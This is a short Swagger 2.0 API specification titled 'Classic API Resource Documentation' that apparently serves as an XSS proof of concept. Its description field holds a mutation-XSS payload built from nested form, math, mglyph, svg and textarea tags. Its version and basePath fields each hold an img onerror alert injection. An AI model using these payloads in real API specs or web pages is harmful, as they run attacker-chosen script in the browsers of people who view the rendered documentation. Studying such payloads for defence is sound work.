swagger: '2.0'
info:
  title: Classic API Resource Documentation
  description: |
    aaa<form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea><img onerror=alert('XSS-Encontrado') src=1>"></form>

  version: production"><img onerror=alert('XSS-Encontrado') src=1>
basePath: /JSSResource/"><img onerror=alert('XSS-Encontrado') src=1>
produces:
  - application/xml
  - application/json
consumes:
  - application/xml
  - application/json
security:
  - basicAuth: []
